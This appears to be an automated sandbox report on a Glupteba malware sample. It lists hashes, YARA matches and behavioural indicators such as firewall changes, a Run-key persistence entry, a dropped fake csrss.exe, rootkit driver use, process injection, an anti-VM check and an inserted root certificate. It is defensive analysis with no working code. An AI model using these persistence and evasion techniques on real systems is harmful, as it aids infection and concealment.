Analysis
-
max time kernel
147s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
11/06/2024, 21:14
Static task
static1
Behavioral task
behavioral1
Sample
9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe
Resource
win7-20240508-en
General
-
Target
9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe
-
Size
3.9MB
-
MD5
9f8a475abce8ee5d836319045b20b65d
-
SHA1
89eeee314fd0f4a1bb48a24ed37cb985897660f3
-
SHA256
807457fd6828a6c089bfe1808dd9b21c3820fad6e54e18b517cb0bbd38abc42a
-
SHA512
1f4426cbd2b441e9ae1e1c0f473a97a71b8d1a4eac47743a26c2d7fa64441e59aeb5d9c88c9362a0a7f63a11ffd2a2713f2a3818ce46af3982df3289051f720c
-
SSDEEP
98304:IzkDz5Z5gxwn2hPMW35eQ7Cr56fWHd2JID4VV2iwbZ:+kDb5gaOj35u6fWHd2JIqV5QZ
Malware Config
Signatures
-
Glupteba payload 35 IoCs
resource yara_rule behavioral2/memory/1288-2-0x0000000002C80000-0x0000000003375000-memory.dmp family_glupteba behavioral2/memory/2356-4-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/2356-5-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/2356-8-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/2356-9-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/2356-10-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/2356-6-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/2356-7-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/2356-17-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/1948-24-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/1948-25-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/1948-27-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/1948-28-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/1948-23-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/1948-32-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/3328-44-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/3328-45-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/3328-43-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/3328-46-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/3328-47-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/3328-48-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/3328-49-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/3328-52-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/3328-53-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/3328-55-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/3328-57-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/3328-58-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/3328-59-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/3328-61-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/3328-62-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/3328-63-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/3328-64-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/3328-65-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/3328-66-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/3328-68-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 1128 netsh.exe 2036 netsh.exe -
Executes dropped EXE 3 IoCs
pid Process 2360 csrss.exe 3328 csrss.exe 992 patch.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EmptySound = "\"C:\\Windows\\rss\\csrss.exe\"" 9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
description ioc Process File opened for modification \??\WinMonFS csrss.exe -
Modifies boot configuration data using bcdedit 1 IoCs
pid Process 3968 bcdedit.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1288 set thread context of 2356 1288 9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe 82 PID 1840 set thread context of 1948 1840 9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe 87 PID 2360 set thread context of 3328 2360 csrss.exe 95 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN 9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File opened for modification C:\Windows\rss 9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe File created C:\Windows\rss\csrss.exe 9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 536 schtasks.exe 2676 schtasks.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2871 = "Magallanes Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1502 = "Turkey Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2321 = "Sakhalin Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2592 = "Tocantins Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2061 = "North Korea Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-3142 = "South Sudan Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2892 = "Sudan Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2162 = "Altai Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2181 = "Astrakhan Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1932 = "Russia TZ 11 Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" csrss.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 csrss.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 csrss.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 csrss.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 2356 9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe 2356 9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe 1948 9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe 1948 9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe 3328 csrss.exe 3328 csrss.exe 3328 csrss.exe 3328 csrss.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2356 9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe Token: SeImpersonatePrivilege 2356 9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe Token: SeSystemEnvironmentPrivilege 3328 csrss.exe -
Suspicious use of WriteProcessMemory 43 IoCs
description pid Process procid_target PID 1288 wrote to memory of 2356 1288 9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe 82 PID 1288 wrote to memory of 2356 1288 9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe 82 PID 1288 wrote to memory of 2356 1288 9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe 82 PID 1288 wrote to memory of 2356 1288 9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe 82 PID 1288 wrote to memory of 2356 1288 9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe 82 PID 1288 wrote to memory of 2356 1288 9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe 82 PID 1288 wrote to memory of 2356 1288 9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe 82 PID 1288 wrote to memory of 2356 1288 9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe 82 PID 1288 wrote to memory of 2356 1288 9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe 82 PID 1288 wrote to memory of 2356 1288 9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe 82 PID 1840 wrote to memory of 1948 1840 9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe 87 PID 1840 wrote to memory of 1948 1840 9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe 87 PID 1840 wrote to memory of 1948 1840 9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe 87 PID 1840 wrote to memory of 1948 1840 9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe 87 PID 1840 wrote to memory of 1948 1840 9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe 87 PID 1840 wrote to memory of 1948 1840 9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe 87 PID 1840 wrote to memory of 1948 1840 9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe 87 PID 1840 wrote to memory of 1948 1840 9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe 87 PID 1840 wrote to memory of 1948 1840 9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe 87 PID 1840 wrote to memory of 1948 1840 9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe 87 PID 1948 wrote to memory of 1896 1948 9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe 88 PID 1948 wrote to memory of 1896 1948 9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe 88 PID 1896 wrote to memory of 1128 1896 cmd.exe 90 PID 1896 wrote to memory of 1128 1896 cmd.exe 90 PID 1948 wrote to memory of 4976 1948 9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe 91 PID 1948 wrote to memory of 4976 1948 9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe 91 PID 4976 wrote to memory of 2036 4976 cmd.exe 93 PID 4976 wrote to memory of 2036 4976 cmd.exe 93 PID 1948 wrote to memory of 2360 1948 9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe 94 PID 1948 wrote to memory of 2360 1948 9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe 94 PID 1948 wrote to memory of 2360 1948 9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe 94 PID 2360 wrote to memory of 3328 2360 csrss.exe 95 PID 2360 wrote to memory of 3328 2360 csrss.exe 95 PID 2360 wrote to memory of 3328 2360 csrss.exe 95 PID 2360 wrote to memory of 3328 2360 csrss.exe 95 PID 2360 wrote to memory of 3328 2360 csrss.exe 95 PID 2360 wrote to memory of 3328 2360 csrss.exe 95 PID 